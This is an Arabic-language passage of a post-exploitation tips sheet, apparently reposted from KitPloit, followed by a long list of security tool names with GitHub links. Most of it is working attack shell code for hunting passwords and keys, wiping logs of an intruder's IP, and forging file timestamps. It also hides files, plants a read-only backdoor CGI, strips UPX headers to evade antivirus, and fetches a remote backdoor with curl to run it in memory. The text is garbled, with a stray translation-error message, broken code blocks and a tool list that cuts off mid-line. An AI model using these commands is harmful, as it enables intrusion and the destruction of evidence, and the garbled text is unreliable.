- استخدم [Chrome-ABE](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption) لاستخراج وفك تشفير كلمات مرور Chrome من العملية قيد التشغيل (نظام Windows فقط)
- استخرج كلمات المرور من المتصفحات باستخدام [https://github.com/kiryano/chrome-password-decryptor](https://github.com/kiryano/chrome-password-decryptor)

باستخدام `grep`:```sh
# Find passwords (without garbage).
grep -HEronasi  '.{,16}password.{,64}' .
# Find TLS or OpenSSH keys:
grep -r -F -- " PRIVATE KEY-----" .

ابحث عن النطاقات الفرعية أو رسائل البريد الإلكتروني في الملفات:```bash resolv() { while read -r x; do r="$(getent hosts "$x")" || continue; echo "${r%% *}"$'\t'"${x}"; done; } find_subdomains() { local d="${1//./\.}" local rexf='[0-9a-zA-Z_.-]{0,64}'"${d}" local rex="$rexf"'([^0-9a-zA-Z_]{1}|$)' [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain .com | anew"; return; } shift 1 [ $# -le 0 ] && [ -t 0 ] && set -- . command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eao "$rexf"; return; } grep -Eaohr "$rex" "$@" | grep -Eo "$rexf" }

find_subdomain .foobar.com | anew | resolv

find_subdomain @gmail.com | anew

root@kitploit:~
---
<a id="shell-hacks"></a>
## 8. حيل Shell
<a id="shred"></a>
**8.i. Shred ومسح ملف**```sh
shred -z foobar.txt

لم يتم توفير نص المُدخل (INPUT) الخاص بالجزء 406 لترجمته.```sh

SHRED without shred command

shred() { [[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; } dd status=none bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1" rm -f "${1:?}" } shred foobar.txt

root@kitploit:~
Note: أو ضع ملفاتك في دليل */dev/shm* بحيث لا تتم كتابة أي بيانات على القرص الصلب. سيتم حذف البيانات عند إعادة التشغيل.

Note: أو احذف الملف ثم املأ القرص الصلب بالكامل بـ /dev/urandom ثم نفّذ rm -rf على ملف التفريغ.

<a id="restore-timestamp"></a>
**8.ii. استعادة تاريخ ملف**

لنفترض أنك عدّلت */etc/passwd* لكن تاريخ الملف يُظهر الآن أنه تم تعديل */etc/passwd*. استخدم *touch* لتغيير تاريخ الملف إلى تاريخ ملف آخر (في هذا المثال، */etc/shadow*)```sh
touch -r /etc/shadow /etc/passwd
# verify with 'stat /etc/passwd'

استخدم hackshell و ctime /etc/passwd لضبط ctime ووقت الإنشاء أيضًا.

8.iii. مسح ملف السجل

سيؤدي هذا إلى إعادة تعيين ملف السجل إلى 0 دون الحاجة إلى إعادة تشغيل syslogd وما إلى ذلك:```sh

/var/log/auth.log # or on old shells: cat /dev/null >/var/log/auth.log

root@kitploit:~
سيؤدي هذا إلى إزالة أي سطر يحتوي على عنوان IP `1.2.3.4` من ملف السجل:```sh
xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; }

أمثلة:```sh

xlog "1.2.3.4" /var/log/auth.log

xlog "${SSH_CLIENT%% *}" /var/log/auth.log

xlog "^2023.* thc.org" foo.log

root@kitploit:~
<a id="shell-hide-files"></a>
**8.iv. إخفاء الملفات عن ذلك المستخدم بدون صلاحيات الجذر**

دليل العمل المفضّل لدينا هو */dev/shm/*. هذه المساحة هي ذاكرة متطايرة وستُفقد عند إعادة التشغيل. لا سجلات == لا جريمة.

إخفاء الملفات الدائمة:

الطريقة الأولى:```sh
alias ls='ls -I system-dev'

هذا سيخفي الدليل system-dev من أمر ls. ضعه في ~/.profile الخاص بالمستخدم أو في /etc/profile على مستوى النظام.

الطريقة 2: خدع من الثمانينيات. فكّر في أي دليل نادرًا ما ينظر إليه المسؤول (مثل /boot/.X11/.. أو ما شابه):```sh mkdir '...' cd '...'

root@kitploit:~
الطريقة 3:
يسمح Unix بأسماء ملفات تحتوي تقريبًا على أي حرف ASCII باستثناء 0x00. جرّب علامة التبويب (*\t*). يحدث أن معظم مدراء الأنظمة لا يعرفون كيفية استخدام cd للدخول إلى أي دليل من هذا القبيل.```sh
mkdir $'\t'
cd $'\t'

8.v. جعل ملف غير قابل للتعديل

سيؤدي هذا إلى إعادة توجيه /var/www/cgi/blah.cgi إلى /boot/backdoor.cgi. لا يمكن تعديل أو حذف الملف blah.cgi (ما لم يتم فك تركيبه).```sh

/boot/backdoor.cgi contains our backdoor

touch /var/www/cgi/blah.cgi mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi

root@kitploit:~
<a id="nosudo"></a>
**8.vi. تغيير المستخدم بدون sudo/su**

مطلوب لالتقاط لقطات شاشة لجلسات X11 (المعروف أيضًا باسم `xwd -display :0 -silent -root | convert - jpg:screenshot.jpg` أو `import -display :0 -window root screenshot.png`)```bash
xsu() {
    local name="${1:?}"
    local u g h
    local cmd="python"

    command -v python3 >/dev/null && cmd="python3"
    [ $UID -ne 0 ] && { HS_ERR "Need root"; return; }
    u=$(id -u ${name:?}) || return
    g=$(id -g ${name:?}) || return
    h="$(grep "^${name}:" /etc/passwd | cut -d: -f6)" || return
    HOME="${h:-/tmp}" "$cmd" -c "import os;os.setgid(${g:?});os.setuid(${u:?});os.execlp('bash', 'bash')"
}
# xsu user

8.vii. إخفاء وتشفير الحمولة

استخدم UPX لتغليف ملف ثنائي ELF (مثال /bin/id):```shell BIN="mybin" upx -qqq /bin/id -o "${BIN}"

root@kitploit:~
نظّف [ترويسة UPX](https://github.com/upx/upx/blob/devel/src/stub/src/include/header.S) وترويسة ELF الثانية لخداع مضاد الفيروسات:```shell
perl -i -0777 -pe 's/^(.{64})(.{0,256})UPX!.{4}/$1$2\0\0\0\0\0\0\0\0/s' "${BIN}"
perl -i -0777 -pe 's/^(.{64})(.{0,256})\x7fELF/$1$2\0\0\0\0/s' "${BIN}"

اختياريًا، قم بتنظيف التوقيعات وآثار UPX:```shell cat "${BIN}"
| perl -e 'local($/);$=<>;s/(.)($Info:[^\0])(.*)/print "$1";print "\0"x length($2); print "$3"/es;'
| perl -e 'local($/);$
=<>;s/(.)($Id:[^\0])(.)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx" mv "${BIN}.tmpupx" "${BIN}" grep -Eqm1 "PROT_EXEC|PROT_WRITE" "${BIN}"
&& cat "${BIN}" | perl -e 'local($/);$_=<>;s/(.
)(PROT_EXEC|PROT_WRI[^\0])(.)/print "$1";print "\0"x length($2); print "$3"/es;' >"${BIN}.tmpupx"
&& mv "${BIN}.tmpupx" "${BIN}" perl -i -0777 -pe 's/UPX!/\0\0\0\0/sg' "${BIN}"

root@kitploit:~
تحقق من أنه لا يمكن فك تغليف الملف الثنائي:```shell
upx -d "${BIN}"  # Should fail with 'not packed by UPX'

يمكنك اختياريًا تشفيره باستخدام bincrypter.

8.viii. نشر باب خلفي دون لمس نظام الملفات

ابدأ بابًا خلفيًا دون الكتابة إلى نظام الملفات أو عندما تكون جميع المواقع القابلة للكتابة مثبّتة بعلامة noexec الخبيثة.

سطر Perl واحد لتحميل ملف ثنائي إلى الذاكرة وتنفيذه (دون لمس أي قرص أو /dev/shm أو /tmp). راجع Hackshell للمزيد.```sh memexec() { local stropen strread local strargv0='"foo", ' [ -t 0 ] && { stropen="open($i, '<', '$1') or die 'open: $!';" strread='$i' unset strargv0 } # Check Syscall-NR: perl -e 'require "sys/syscall.ph"; printf &SYS_memfd_create;' perl -e '$f=syscall(319, $n="", 1); if(-1==$f){ $f=syscall(279, $n="", 1); if(-1==$f){ die "memfd_create: $!";}} '"${stropen}"' open($o, ">&=".$f) or die "open: $!"; while(<'"${strread:-STDIN}"'>){print $o $_;} exec {"/proc/$$/fd/$f"} '"${strargv0}"'@ARGV or die "exec: $!";' -- "$@" }

Example usage:

memexec /usr/bin/id -u

cat /usr/bin/id | memexec -u

curl -SsfL https://thc.org/my-backdoor-binary | memexec

root@kitploit:~
أقصر صيغة ممكنة هي (مثال):```shell
memexec(){ perl '-e$^F=255;for(319,279,385,4314,4354){($f=syscall$_,$",0)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}X,@ARGV;exit 255' -- "$@";}
# Example: cat /usr/bin/id | memexec -u

Read more

تنزيل الأداة
الاسمالرابط
A
AADInternalshttps://github.com/Gerenios/AADInternals
ABAP LMH Encodehttps://github.com/gelim/abap_lmh_encode
ABAP Log Readerhttps://github.com/sap-depot/ABAP-Log-Reader
ABAP Rainbow Tablehttps://github.com/gelim/abap_rainbow_table
ABAP SQLihttps://github.com/emil-ma/ABAP-SQLi
abducthttps://github.com/SharonBrizinov/abduct
ABRhttps://github.com/Poppycompass/ABR
AbuTraderhttps://github.com/konfortes/abutrader
abybaddiScanhttps://github.com/H4kForNet/abybaddiScan
Accessibility Event Testerhttps://github.com/kshoji/Accessibility-Event-Tester
account-shadowsockshttps://github.com/thefloweringash/account-shadowsocks
achilleshttps://github.com/wmliang/achilles
Acunetix Interpreterhttps://github.com/UltimateHackers/Acunetix-Interpreter
acushttps://github.com/ancat/acus
ad-ldap-enumhttps://github.com/CroweCybersecurity/ad-ldap-enum
AdamantiumThiefhttps://github.com/lgandx/AdamantiumThief
adapthttps://github.com/0xv1n/adapt
AdobeColorPicker POChttps://github.com/worawit/AdobeColorPicker
ADSpiderhttps://github.com/Arno0x/ADSpider
ADVulnScanhttps://github.com/cybersecsi/ADVulnScan
AEGIShttps://github.com/RedstoneLab/AEGIS
aes-finderhttps://github.com/ManteMaurice/aes-finder
aes_key_finderhttps://github.com/svdb0/aes_key_finder
AES-128-CFB-128https://github.com/AODV/AES-128-CFB-128
AFBosthttps://github.com/r3dg0d/AFBost
afflatushttps://github.com/Awayume/afflatus
AFThttps://github.com/itsKindred/AFT
AFT-Androidhttps://github.com/itsKindred/AFT-Android
ahhhmazinghttps://github.com/zMarch/ahhhmazing
AILICEhttps://github.com/ElevenPaths/AILICE
Air Bashhttps://github.com/tehw0lf/airbash
Airopyhttps://github.com/9ik1n/airopy
Airstrikehttps://github.com/Redline1o1/Airstrike
ai/nlp attackhttps://github.com/Ch1keen/AI-NLP-Attack
aiodnsbrutehttps://github.com/blark/aiodnsbrute
ajpfuzzerhttps://github.com/scanlime/ajpfuzzer
aktaionhttps://github.com/jzadeh/aktaion
Aladdinhttps://github.com/tacnetsol/aladdin
alfheimhttps://github.com/willmullins/alfheim
Aliucordhttps://github.com/Aliucord/Aliucord
AlliNhttps://github.com/HUC-IG/AlliN
alpaca-code-exechttps://github.com/Pwntus/alpaca-code-exec
amIaurhttps://github.com/iNoSec/amIaur
AnchorWatchhttps://github.com/gutianxhe/AnchorWatch
andaluzhttps://github.com/bcattaneo/andaluz
Android-InsecureBankv2https://github.com/dineshshetty/Android-InsecureBankv2
Android Network Toolshttps://github.com/stealthcopter/AndroidNetworkTools
Android-Reports-and-Resourceshttps://github.com/B3nac/Android-Reports-and-Resources
Android Securityhttps://github.com/Shubham-Prajapati1/Android-Security
Android-SSL-TrustKillerhttps://github.com/iSECPartners/Android-SSL-TrustKiller
Android Tamer BHhttps://github.com/AndroidTamer/Tools_BH_2016
AndroidAppProxyhttps://github.com/prio101/AndroidAppProxy
android_tcpdumphttps://github.com/vulnersCom/android_tcpdump
Angerhttps://github.com/emil-ma/Anger
Anglerhttps://github.com/samyk/angler
angr (https://angr.io)https://github.com/angr/angr
antijvmhttps://github.com/zxkane/antijvm
AntManhttps://github.com/evilsocket/AntMan
AnyFiddlehttps://github.com/fayz75/AnyFiddle
AORThttps://github.com/D3Ext/AORT
Apachishttps://github.com/securisec/apachis
APK Enumhttps://github.com/shivsahni/APKEnum
Apk URL Parserhttps://github.com/nicchongwb/ApkURLParser
apk2urlhttps://github.com/n0mi1k/apk2url
APKHunthttps://github.com/Cyber-Buddy/APKHunt
ApkScannerhttps://github.com/nicozhuang/ApkScanner
ApkSpy (https://www.apkspy.com)https://github.com/ks1ng/ApkSpy
AppLockerhttps://github.com/tsgrgo/AppLocker
AppMonhttps://github.com/dpnishant/appmon
APT11 Reporthttps://github.com/n4xh4ck5/APT11_Report
AQUARMOURYhttps://github.com/samgtt/AQUARMOURY
ARDThttps://github.com/mmatoscom/ARDT
Argonhttps://github.com/chris-pardue/argon
Argushttps://github.com/jwpapi/argus
Arjunhttps://github.com/s0md3v/Arjun
ARMBountyhttps://github.com/emtee40/ARMBounty
ARMORYhttps://github.com/smokeme/armory
ARPGuardhttps://github.com/e-loop/arpguard
ARTIFhttps://github.com/noraj/ARTIF
Artilleryhttps://github.com/BinaryDefense/artillery
aruba-os-activation-bypasshttps://github.com/s4squatch/aruba-os-activation-bypass
asammdf-guihttps://github.com/elementzonline/asammdf-gui
ashokhttps://github.com/ankitdobhal/ashok
Asmihttps://github.com/LiveOverflow/Asmi
ASN Lookuphttps://github.com/yassineaboukir/Asnlookup
ASNmaphttps://github.com/projectdiscovery/asnmap
ASOChttps://github.com/cyrius-nt/ASOC
ASPScanhttps://github.com/AonCyberLabs/ASPScan
Assessorhttps://github.com/Dejavu666/Assessor
Astarothhttps://github.com/deadjakk/astaroth
AT-AThttps://github.com/SpiderLabs/AT-AT
Athenahttps://github.com/grey-noise/athena
Atlashttps://github.com/m4st3r-4ck3r/atlas
AtlasReaperhttps://github.com/NetanelTzur/AtlasReaper
AttackSurfaceMapperhttps://github.com/superhedgy/AttackSurfaceMapper
Auto-Root-Exploithttps://github.com/nickcao/Auto-Root-Exploit
Autohackhttps://github.com/an0nud4y/Autohack
AutomatedIrrigatorhttps://github.com/jseidl/AutomatedIrrigator
Automated Pentesthttps://github.com/0x0mar/automated-pentest
Automated-SSRF-Finderhttps://github.com/vipinkhushu/Automated-SSRF-Finder
AutoSploithttps://github.com/NullArray/AutoSploit
Autovpnhttps://github.com/adtitasic/autovpn
AV Evasion Crafthttps://github.com/g1thub3r3/Av_Evasion_Craft
Avethttps://github.com/govolution/avet
AVClass++https://github.com/malicialab/avclassplusplus
AwesomeXSShttps://github.com/s0md3v/AwesomeXSS
AWS-BucketDumphttps://github.com/jordanpotti/AWSBucketDump
AWS-Security-Toolboxhttps://github.com/z0r0z/aws-security-toolbox
awspxhttps://github.com/FSecureLABS/awspx
Azure-AD-Conditional-Access-Frameworkhttps://github.com/dafthack/Azure-AD-Conditional-Access-Framework
AzureADLateralMovementhttps://github.com/talmaor/AzureADLateralMovement
AzureHoundhttps://github.com/BloodHoundAD/AzureHound
AzureOffensiveToolshttps://github.com/NotoriousNate/AzureOffensiveTools
AzurePasswordResethttps://github.com/lucasvmx/AzurePasswordReset
AzurePwnhttps://github.com/nccgroup/AzurePwn
Azuritehttps://github.com/FSecureLABS/Azurite
B
B-SShttps://github.com/nicholasalee/B-SS
Babelhttps://github.com/attackdebris/babel
BabbySploithttps://github.com/m4ll0k/BabbySploit
BackBonehttps://github.com/m4cs/BackBone
Backdexhttps://github.com/sensepost/backdex
BackdoorBrawlhttps://github.com/AlphaDelta/BackdoorBrawl
backdoormehttps://github.com/Kkevsterrr/backdoorme
backslash powered scannerhttps://github.com/PortSwigger/backslash-powered-scanner
backupbrutehttps://github.com/gh0std4ncer/backupbrute
BadIntenthttps://github.com/michenriksen/badintent
BadModhttps://github.com/SirCrypto/BadMod
BadPDFhttps://github.com/deepzec/Bad-Pdf
BadUSB Payloadshttps://github.com/nocomp/BadUSB-Payloads
Bandicoothttps://github.com/n0nexist/Bandicoot
Banehttps://github.com/Alfredredbird/bane
Bansheehttps://github.com/ghostlulzhacks/Banshee
Barqhttps://github.com/MohamedNourTN/Barq
BAShttps://github.com/ym2011/BAS
Base64 URL encoder/decoderhttps://github.com/0xHasanM/Base64-URL-Encoder-Decoder
Base64Imagehttps://github.com/akhilharihar/Base64Image
bash-rand-backdoorhttps://github.com/unkaktus/bash-rand-backdoor
Basharkhttps://github.com/redcode-labs/Bashark
BashFunchttps://github.com/Anon-Exploiter/BashFunc
Basharkhttps://github.com/TheSecondSun/Bashark
BashScanhttps://github.com/astryzia/BashScan
Bashterhttps://github.com/zeroby0/Bashter
bbqsqlhttps://github.com/CiscoCXSecurity/bbqsql
BCA-onelinerhttps://github.com/hahwul/BCA-oneliner
BDFProxyhttps://github.com/secretsquirrel/BDFProxy
Behinderhttps://github.com/rebeyond/Behinder
BeEFhttps://github.com/beefproject/beef
Belatihttps://github.com/aancw/Belati
belleboxhttps://github.com/chokepoint/bellebox
Bento4https://github.com/axiomatic-systems/Bento4
Berserkerhttps://github.com/jacopodl/Berserker
BFAChttps://github.com/mazen160/bfac
BFS Ekoparty Exploithttps://github.com/gwillen/BFS-Ekoparty-Exploit
BGP Hijackhttps://github.com/lewisxy/bgphijack
BGPStreamhttps://github.com/CAIDA/bgpstream
bh toolhttps://github.com/kyaw1n/bh
BHRhttps://github.com/s0md3v/BHR
Bichohttps://github.com/mfontanini/bicho
Bifrosthttps://github.com/pmalmsten/bifrost
bigbadbyteshttps://github.com/craigz28/bigbadbytes
BilboBothttps://github.com/TeamMdk/BilboBot
BinAbsInspectorhttps://github.com/KeenSecurityLab/BinAbsInspector
binaryaihttps://github.com/binaryai/sdk
BinCAThttps://github.com/airbus-seclab/bincat
binmaphttps://github.com/niclasko/binmap
binoclehttps://github.com/niclasko/binocle
BINhttps://github.com/malicialab/BIN
BinDiffhttps://github.com/google/bindiff
BindShell-Pythonhttps://github.com/gh0x0st/BindShell-Python
BingDorkerhttps://github.com/jakewarren/bingdorker
Bingoohttps://github.com/magnumripper/bingoo
binjectorhttps://github.com/creaktive/binjector
BinParcelhttps://github.com/OALabs/BinParcel
BinSecurehttps://github.com/AirbusCyber/BinSecure
BinSkimhttps://github.com/microsoft/binskim
BinSourcererhttps://github.com/BinSourcerer/binsourcerer
binspecthttps://github.com/m0bilesecurity/binspect
binwallyhttps://github.com/r3tr0/binwally
BinSynchttps://github.com/angr/binsync
Birmhttps://github.com/danielmiessler/Birm
BISH Bashhttps://github.com/tjomk/bishbash
BitFunnelhttps://github.com/BitFunnel/NativeJIT
BitLockerSpyhttps://github.com/Hackndo/bitlockerspy
BitPimhttps://github.com/ajv998/bitpim
BitPwnhttps://github.com/naiithink/bitpwn
BitTorrent Sync Decoderhttps://github.com/fernandopereg/btsync-decoder
BitwardenDecrypthttps://github.com/shantanu561993/BitwardenDecrypt
biwxhttps://github.com/utds3lab/biwx
BLACKHAThttps://github.com/stephaneclavel/BLACKHAT
BlackHole DNShttps://github.com/m0nad/DNS-BlackHole
BlackNethttps://github.com/TheSph1nx/BlackNet
BlackWidowhttps://github.com/1N3/BlackWidow
BLEnumUsershttps://github.com/dafthack/BLEnumUsers
Blevehttps://github.com/blevesearch/bleve
Blinderhttps://github.com/mthbernardes/Blinder
Blinqhttps://github.com/carlospolop/Blinq
BLISKhttps://github.com/Mosuan/BLISK
Blockyhttps://github.com/0xERR0R/blocky
BlogBridgehttps://github.com/mrwilson/blogbridge
BloodHoundhttps://github.com/BloodHoundAD/BloodHound
BloodHound.pyhttps://github.com/fox-it/BloodHound.py
BloodyADhttps://github.com/CravateRouge/bloodyAD
BluBunnyhttps://github.com/veerendra2/BluBunny
blue_sonarhttps://github.com/ZeroChaos-/blue_sonar
Bluebox-nghttps://github.com/jesusprubio/bluebox-ng
Bluefoghttps://github.com/HKUST-Aerial-Robotics/Bluefog
BlueKeephttps://github.com/0xeb-bp/bluekeep
BlueKeep-Scannerhttps://github.com/nationalsecurityagency/bluekeep-scanner
BlueRangerhttps://github.com/FSecureLABS/BlueRanger
BLUESPAWNhttps://github.com/ION28/BLUESPAWN
Bluffyhttps://github.com/optiv/Bluffy
bmp2hexhttps://github.com/benhoyt/bmp2hex
BMPanelhttps://github.com/v0l/bmpanel
BN++https://github.com/aj3423/BNPlusPlus
BoNeSihttps://github.com/Markus-Go/bonesi
BootHolehttps://github.com/eclypsium/BootHole
Botnet-Frameworkhttps://github.com/Ali-Razmjoo/Botnet-Framework
Bottomless-Clipboardhttps://github.com/GhostSquad57/Bottomless-Clipboard
Bowcasterhttps://github.com/zcutlip/bowcaster
BPF Compiler Collectionhttps://github.com/iovisor/bcc
BPFTracehttps://github.com/iovisor/bpftrace
bpftrace-toolshttps://github.com/brendangregg/bpftrace-tools
BPGhttps://github.com/google/bpg
bplisthttps://github.com/libimobiledevice/bplist
BPQLhttps://github.com/bpql/bpql
BrakToothhttps://github.com/Matheus-Garbelini/braktooth_esp32_bt_brute_force_poc
Brandonhttps://github.com/BC-SECURITY/Brandon
BreakDevhttps://github.com/vvunov/breakdev
BreachCheckhttps://github.com/mkhuda/breachcheck
Bridahttps://github.com/federicodotta/Brida
BruteLoopshttps://github.com/arch4ngel/BruteLoops
BruteSploithttps://github.com/Screetsec/BruteSploit
BruteXhttps://github.com/1N3/BruteX
BSODhttps://github.com/MalwareSamples/BSOD
BSSRFhttps://github.com/ethicalhack3r/BSSRF
BTCRecoverhttps://github.com/gurnec/btcrecover
BucketCathttps://github.com/JoeyM4/BucketCat
BucketInspectorhttps://github.com/michenriksen/bucketinspector
BucketStreamhttps://github.com/eth0izzle/bucket-stream
BugBountyToolkithttps://github.com/0x4f/bugbountytoolkit
BugDorkhttps://github.com/lulz3xploit/BugDork
BugFinderhttps://github.com/thehackersbrain/BugFinder
Buggyhttps://github.com/oleavr/buggy
bugscanner-gohttps://github.com/akashkokare/bugscanner-go
BugSpyhttps://github.com/s0md3v/BugSpy
BugSwathttps://github.com/pathetiq/BugSwat
BulkExtractorhttps://github.com/simsong/bulk_extractor
Bumpp](https://github.com/k4m4/bumpp)```sh